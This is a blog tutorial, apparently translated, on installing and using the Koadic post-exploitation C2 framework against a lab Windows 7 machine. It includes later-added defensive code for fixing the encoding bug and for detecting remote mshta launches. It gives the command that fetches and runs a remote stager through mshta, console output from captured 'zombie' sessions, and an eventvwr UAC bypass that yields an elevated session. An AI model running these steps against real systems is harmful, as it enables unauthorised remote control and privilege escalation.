Koadic remote control tool: installation and use --- http c2

Koadic installation and use

Posted 2017.11.26 11:02 (690 words, 611 reads, 0 comments)

Outline

Koadic is a post-exploitation tool that came out of DEF CON. It performs most of its operations through VBScript and JScript.
The demo starts below.

Preparing the Environment

I prepared two virtual machines: Kali is the attacking machine
and a 64-bit Windows 7 is the victim.

Installation

Installation is very simple:
git clone https://github.com/zerosum0x0/koadic.git
then install the dependencies:
cd koadic/
pip install -r requirements.txt

Use

Run:
./koadic

                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# 

First we need to understand a few concepts of this tool:

  • Stagers generate the payload on your attacking machine (the stager is what the victim executes to connect back)
  • Implants are the operations you can run once a machine is under your control

The specific stagers and implants are listed on its GitHub page:
https://github.com/zerosum0x0/koadic

Then we run
use stager/js/mshta
which selects the mshta stager.
Next set the IP and port the local listener should use.
You can type the info command to display the parameters that need to be set:
set LHOST 192.168.1.104
set LPORT 9999
and then start it with
run

(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU

Because this is a post-exploitation tool, it assumes you can already execute a command on the computer you control.
Execute the following on the victim machine:
mshta http://192.168.1.104:9999/BYhBU
In my case I just opened a cmd and ran it directly, which worked fine.
Then you hit a Python character-encoding pitfall, and the following error appears:

(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', 49159)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/root/koadic/core/handler.py", line 90, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/koadic/core/handler.py", line 169, in do_POST
    self.session.parse_user_info(data)
  File "/root/koadic/core/session.py", line 56, in parse_user_info
    data = data.decode().split("~~~")
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
----------------------------------------
[!] Zombie 0: Timed out.

The error is:
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
The fix is to change the default character encoding to utf-8.
Here is how to do it:
exit koadic first,
then open the following file:
vim koadic

Add the following at the top:

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

The whole file then looks like this:

#!/usr/bin/env python

import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Copyright (c) 2016 - 2017 RiskSense, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use the software except in compliance with the License.
#
# You may obtain a copy of the License at:
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.

# Disclaimer:
# Usage of Koadic for attacking targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state,
# federal, and international laws. Developers assume no liability and are not
# responsible for any misuse or damage caused by this program.

__version_info__ = (0, 8)
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]

if __name__ == "__main__":
    import core.shell
    banner = open("data/banner.txt", "rb").read().decode("unicode_escape")
    shell = core.shell.Shell(banner, __version__)
    shell.run()
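Why the traceback happens and what the narrower fix looks like, as an added example (this is not Koadic's own code and not from the original post). The quoted session.py line does data.decode() with no encoding argument; under Python 2 that uses the process default, 'ascii', so the first byte of a non-ASCII character in the victim's OS name (专业版 encodes in UTF-8 as e4 b8 93 ...) raises UnicodeDecodeError. The reload(sys)/setdefaultencoding trick changes that global default; naming the encoding at the call site fixes only the line that needs it. The field layout of the posted string (user, hostname, OS, architecture joined by "~~~") is an assumption made for the example; it happens to put the first 0xe4 byte at position 65, the same position the page's error reports. The example runs under Python 3, where the Python 2 behaviour is reproduced by decoding with 'ascii' explicitly.

```python
# -*- coding: utf-8 -*-
"""Added example, not Koadic's own code: reproduce the page's
UnicodeDecodeError and show the call-site fix for parse_user_info."""

# Constructed sample of the fields a zombie posts back, separated by "~~~"
# as in session.py. The exact field layout is an assumption for illustration.
FIELDS = [
    "WIN-HK90RUM6L1B\\bboysoul",      # user
    "WIN-HK90RUM6L1B",                # hostname
    "Microsoft Windows 7 专业版",      # OS name, contains non-ASCII characters
    "64-bit",                         # architecture
]
SAMPLE = "~~~".join(FIELDS).encode("utf-8")


def decode_like_original(data):
    """Mimic the original `data.decode()` under Python 2's 'ascii' default.

    Returns the split field list on success, or a tuple
    (offending_byte, position) when decoding fails, mirroring the
    "can't decode byte 0xe4 in position 65" message from the page."""
    try:
        return data.decode("ascii").split("~~~")
    except UnicodeDecodeError as exc:
        return (data[exc.start], exc.start)


def parse_user_info(data, encoding="utf-8"):
    """Fixed version: decode with an explicit encoding.

    errors='replace' keeps the listener's request thread alive even if a host
    posts bytes in another code page (e.g. GBK on a Chinese Windows), instead
    of crashing the handler and timing the zombie out as seen on the page."""
    return data.decode(encoding, errors="replace").split("~~~")


if __name__ == "__main__":
    print(decode_like_original(SAMPLE))   # (228, 65): 0xe4 at position 65
    print(parse_user_info(SAMPLE))
    # Non-UTF-8 input no longer raises; it just yields replacement characters.
    print(parse_user_info("Microsoft Windows 7 专业版".encode("gbk")))
```

Setting the interpreter-wide default encoding, as the post does, works but masks every implicit decode in the program; the explicit decode above changes only the line the traceback points at and survives a host that reports its name in a non-UTF-8 code page.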

After redoing the above, the error no longer appears:

                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# use stager/js/mshta 
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie 0: Staging new connection (192.168.1.110)
[+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 
(koadic: sta/js/mshta)#
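From the defender's side, the launch that produced the session above is a distinctive event: mshta.exe was given a remote http URL (mshta http://192.168.1.104:9999/BYhBU) instead of a local .hta file, which is MITRE ATT&CK T1218.005 (Mshta). Windows process-creation telemetry (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled) records that command line. The following is an added example, not code from the original post or the Koadic project: it scans constructed process-creation records, flags mshta.exe launched with an http(s) URL, and extracts the host:port so it can be blocked at the egress proxy. The record tuples and field names are an assumption for the example, not a real sensor's schema.

```python
"""Added example (not from the original post or from Koadic): flag mshta.exe
launched with a remote URL, the way the stager on this page is started."""
import re
import shlex
from urllib.parse import urlparse

URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Constructed process-creation records: (parent image, image, command line).
# The first and third mirror the stager command shown on the page; the others
# are benign controls (a local .hta file, and a URL in a non-mshta process).
EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta http://192.168.1.104:9999/BYhBU"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     'mshta.exe "C:\\Users\\bboysoul\\report.hta"'),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\mshta.exe",
     "MSHTA.EXE https://192.168.1.104:9999/N435X"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\cmd.exe",
     "cmd /c ping http://192.168.1.104"),
]


def is_mshta(image):
    """True if the image path's file name is mshta.exe (case-insensitive)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "mshta.exe"


def remote_stager_url(image, cmdline):
    """Return the http(s) URL if this event is mshta.exe loading from the
    network, otherwise None. Non-POSIX splitting keeps Windows backslashes."""
    if not is_mshta(image):
        return None
    try:
        args = shlex.split(cmdline, posix=False)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        args = cmdline.split()
    for arg in args[1:]:
        candidate = arg.strip('"')
        if URL_RE.match(candidate):
            return candidate
    return None


def scan(events):
    """Return one finding per event where mshta.exe fetched a remote URL,
    including the netloc (host:port) to block at the proxy or firewall."""
    hits = []
    for parent, image, cmdline in events:
        url = remote_stager_url(image, cmdline)
        if url is not None:
            hits.append({
                "parent": parent,
                "cmdline": cmdline,
                "url": url,
                "netloc": urlparse(url).netloc,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print("mshta remote load from %s (parent %s): %s"
              % (hit["netloc"], hit["parent"], hit["cmdline"]))
```

The User Agent recorded for the zombie above looks like an ordinary Internet Explorer string for that Windows 7 host, so it is a weak indicator on its own; the command line is the stronger signal, and the host:port it names is what a proxy rule would block.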

Next comes privilege elevation, via UAC bypass.

Enter zombies to see the machines under our control:

(koadic: sta/js/mshta)# zombies 

    ID   IP              STATUS  LAST SEEN       
    ---  ---------       ------- ------------    
    0    192.168.1.110   Alive   2017-11-25 21:27:46

Use "zombies ID" for detailed information about a session.

Enter zombies 0 to view the details of that machine:

(koadic: sta/js/mshta)# zombies 0

    ID:                     0                               
    Status:                 Alive                           
    Last Seen:              2017-11-25 21:28:42             

    IP:                     192.168.1.110                   
    User:                   WIN-HK90RUM6L1B\bboysoul        
    Hostname:               WIN-HK90RUM6L1B                 
    Primary DC:             Unknown                         
    OS:                     Microsoft Windows 7 专业版         
    OSArch:                 64-bit                          
    Elevated:               No                              

    User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Session Key:            f4d7735b8a9d45a5a74ed5a63a164421

    JOB  NAME                            STATUS  ERRNO   
    ---- ---------                       ------- ------- 

Here you can see Elevated shows No, meaning we have not elevated privileges yet.
Enter
use implant/elevate/bypassuac_eventvwr
and look at the info for this module:

(koadic: imp/ele/bypassuac_eventvwr)# info

    NAME        VALUE           REQ     DESCRIPTION     
    -----       ------------    ----    -------------   
    PAYLOAD                     yes     run payloads for a list
    ZOMBIE      ALL             yes     the zombie to target

Here we set PAYLOAD and ZOMBIE to 0: for PAYLOAD, 0 means it is not used; for ZOMBIE, 0 is the zombie number.
Then just run:

(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie 1: Staging new connection (192.168.1.110)
[+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 

Success.
But note that the bypass established a new connection: the original zombie connection is still there but is still not elevated, and the new connection is the one running as the elevated user. If you don't believe it, enter zombies and you will see one more connection:


(koadic: imp/ele/bypassuac_eventvwr)# zombies 

    ID   IP              STATUS  LAST SEEN       
    ---  ---------       ------- ------------    
    0    192.168.1.110   Alive   2017-11-25 21:43:00
    1*   192.168.1.110   Alive   2017-11-25 21:43:00

Use "zombies ID" for detailed information about a session.

Look at the information for zombie 1:

(koadic: imp/ele/bypassuac_eventvwr)# zombies 1

    ID:                     1                               
    Status:                 Alive                           
    Last Seen:              2017-11-25 21:45:35             

    IP:                     192.168.1.110                   
    User:                   WIN-HK90RUM6L1B\bboysoul*       
    Hostname:               WIN-HK90RUM6L1B                 
    Primary DC:             Unknown                         
    OS:                     Microsoft Windows 7 专业版         
    OSArch:                 64-bit                          
    Elevated:               YES!                            

    User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Session Key:            c42dec18786a47f2bc4ee023dc8f69bd

    JOB  NAME                            STATUS  ERRNO   
    ---- ---------                       ------- ------- 

The privilege elevation succeeded.
After elevating privileges on a machine, you can explore the implant modules on your own; specific modules can be used for specific tasks.


Source: www.cnblogs.com/bonelee/p/11403926.html